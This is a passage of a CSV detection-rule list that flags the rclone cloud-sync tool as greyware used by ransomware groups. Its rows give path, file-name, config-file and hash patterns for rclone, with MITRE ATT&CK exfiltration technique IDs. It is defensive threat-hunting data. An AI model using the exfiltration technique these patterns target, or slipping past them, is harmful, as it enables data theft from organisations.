- LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*/rclone.zip*",".{0,1000}\/rclone\.zip.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*/rclone/releases/download/*",".{0,1000}\/rclone\/releases\/download\/.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*/usr/bin/rclone*",".{0,1000}\/usr\/bin\/rclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - 
T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*/usr/share/doc/rclone/*",".{0,1000}\/usr\/share\/doc\/rclone\/.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*\.config\rclone\*",".{0,1000}\\\.config\\rclone\\.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*\AppData\Roaming\rclone*",".{0,1000}\\AppData\\Roaming\\rclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with 
cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*\AppData\Roaming\rclone\rclone.conf*",".{0,1000}\\AppData\\Roaming\\rclone\\rclone\.conf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*\rclone.conf*",".{0,1000}\\rclone\.conf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 
"*\rclone.exe*",".{0,1000}\\rclone\.exe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","interactive mode","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*\rclone.old.exe*",".{0,1000}\\rclone\.old\.exe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*\rclone.rar*",".{0,1000}\\rclone\.rar.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*\rclone.zip*",".{0,1000}\\rclone\.zip.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*>rclone.exe<*",".{0,1000}\>rclone\.exe\<.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*>Rclone<*",".{0,1000}\>Rclone\<.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - 
Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#productname","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*>Rsync for cloud storage<*",".{0,1000}\>Rsync\sfor\scloud\sstorage\<.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#description","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0005a6d6647dd4120f2365c330a0b4acbb345630c40621fb91b5947598503cb0*",".{0,1000}0005a6d6647dd4120f2365c330a0b4acbb345630c40621fb91b5947598503cb0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0008726b00bc9205dcd5681256ef79f185282892f3992614ff4264cb7b0d04fb*",".{0,1000}0008726b00bc9205dcd5681256ef79f185282892f3992614ff4264cb7b0d04fb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - 
abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0040e6c313caa468a8706e3311c534f87d9f56f3353ab50bdc48c9f972f8fac0*",".{0,1000}0040e6c313caa468a8706e3311c534f87d9f56f3353ab50bdc48c9f972f8fac0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*007249202d5840829342cc6597fbff75d446910027417b1d49e94c7485774c7a*",".{0,1000}007249202d5840829342cc6597fbff75d446910027417b1d49e94c7485774c7a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*009c223ca93f5c176828097e0a0931547b79a1e893d77897daca58e82d87813f*",".{0,1000}009c223ca93f5c176828097e0a0931547b79a1e893d77897daca58e82d87813f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*00d485a13e0db43cacbb8a66316906b18356c8e0aed5821d7d26f077943f431e*",".{0,1000}00d485a13e0db43cacbb8a66316906b18356c8e0aed5821d7d26f077943f431e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*00e40aa1125ab7a0c1ea059168555ac4ea15c2d08b7a3361feea0b285f2cf4fc*",".{0,1000}00e40aa1125ab7a0c1ea059168555ac4ea15c2d08b7a3361feea0b285f2cf4fc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*00ea56c041ca5b97b56e70c48d26d77f71774c1c19611af9db6626baaa382404*",".{0,1000}00ea56c041ca5b97b56e70c48d26d77f71774c1c19611af9db6626baaa382404.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*012323674405ca9b97010e222bdd25204eda6b772a8e6e571f946ad35eeaf87b*",".{0,1000}012323674405ca9b97010e222bdd25204eda6b772a8e6e571f946ad35eeaf87b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*014ff0ec700476b19f252a02a43ff70cfc91c29479bb0a59ac21e91d58b4f89c*",".{0,1000}014ff0ec700476b19f252a02a43ff70cfc91c29479bb0a59ac21e91d58b4f89c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*017d3fc6d2c17249a9bf202e115670ed440cdcc9efdb4e23b998cbb3b3dcde96*",".{0,1000}017d3fc6d2c17249a9bf202e115670ed440cdcc9efdb4e23b998cbb3b3dcde96.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0180d8d7b89b3eb0d6a64dad6278fab176a3a5de3507d78ebf242081bf8af491*",".{0,1000}0180d8d7b89b3eb0d6a64dad6278fab176a3a5de3507d78ebf242081bf8af491.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*018350a14e058689eccc58449351dec1d7a63dae2aca0ddec64630e2cc6feb83*",".{0,1000}018350a14e058689eccc58449351dec1d7a63dae2aca0ddec64630e2cc6feb83.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*01b403992457bd8e1bb0d9e3cc353d6196c975d4fe5674a43ee7c807ae669fbd*",".{0,1000}01b403992457bd8e1bb0d9e3cc353d6196c975d4fe5674a43ee7c807ae669fbd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*01b54786c5362c33e97cfd3262d62077b0f8aa6205eebd560832e55796acf1b3*",".{0,1000}01b54786c5362c33e97cfd3262d62077b0f8aa6205eebd560832e55796acf1b3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*02032f5eb062c4bd0631329f1d4b4841ae773dfa3b8c7f8fd60d35f256c86532*",".{0,1000}02032f5eb062c4bd0631329f1d4b4841ae773dfa3b8c7f8fd60d35f256c86532.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*021040edb489ec8c913d032ed729568d01089ecf2bf2e0ac57c062be9a61eb13*",".{0,1000}021040edb489ec8c913d032ed729568d01089ecf2bf2e0ac57c062be9a61eb13.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*02207a474093579fcf87ba000b9e42c762835e27505240ba263864e1825b81ef*",".{0,1000}02207a474093579fcf87ba000b9e42c762835e27505240ba263864e1825b81ef.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*027b9322fa12d2eaa9805dba4502ae3f69f3327db869f573340377770a0f7189*",".{0,1000}027b9322fa12d2eaa9805dba4502ae3f69f3327db869f573340377770a0f7189.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*029c12f3aba6b794b8ba2822246b8b7763e8427bc30bfbe761f8306fe70ebb7b*",".{0,1000}029c12f3aba6b794b8ba2822246b8b7763e8427bc30bfbe761f8306fe70ebb7b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*02d693753ae4fec141914593c37a06d2c033ec94b2d137996d74600432491f8f*",".{0,1000}02d693753ae4fec141914593c37a06d2c033ec94b2d137996d74600432491f8f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*031058faff9335052b9be0437342442bc4c67d1fe9e8c179a78ba54b92f2480a*",".{0,1000}031058faff9335052b9be0437342442bc4c67d1fe9e8c179a78ba54b92f2480a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*033d38c476d5b4bb00e7f5e4dfad682081c3832853351fe12f4deb9ec8ea569d*",".{0,1000}033d38c476d5b4bb00e7f5e4dfad682081c3832853351fe12f4deb9ec8ea569d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 